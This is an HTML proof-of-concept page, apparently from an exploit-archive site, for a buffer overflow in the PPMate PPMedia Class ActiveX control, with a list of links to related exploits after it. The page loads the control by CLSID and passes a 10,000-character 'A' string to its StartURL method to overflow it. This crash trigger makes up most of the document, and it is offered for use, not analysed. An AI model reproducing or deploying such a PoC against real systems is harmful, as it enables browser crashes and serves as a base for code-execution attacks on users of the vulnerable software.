<html>
<body> <object id=target
classid=clsid:72B15B25-2EC8-4CDD-B284-C89A5F8E8D5F></object>
<script language=vbscript> arg1=String(10000, "A")
target.StartURL(arg1) </script>
</body>
</html>
【PPMate PPMedia Class ActiveX Control Buffer Overflow PoC】相关文章:
★ Microsoft Access (Snapview.ocx 10.0.5529.0) ActiveX Remote Exploit
★ Dana IRC 1.4a Remote Buffer Overflow Exploit
★ IntelliTamper 2.07 (imgsrc) Remote Buffer Overflow Exploit
★ FreeBSD mcweject 0.9 (eject) Local Root Buffer Overflow Exploit
★ Trend Micro OfficeScan ObjRemoveCtrl ActiveX Control BOF Exploit
★ Adobe Acrobat 9 ActiveX Remote Denial of Service Exploit
★ Maian Events 2.0 Insecure Cookie Handling Vulnerability
★ BrowseDialog Class (ccrpbds6.dll) Internet Explorer Denial of Service
★ WarFTP 1.65 (USER) Remote Buffer Overlow Exploit
★ Download Accelerator Plus - DAP 8.6 (AniGIF.ocx) Buffer Overflow PoC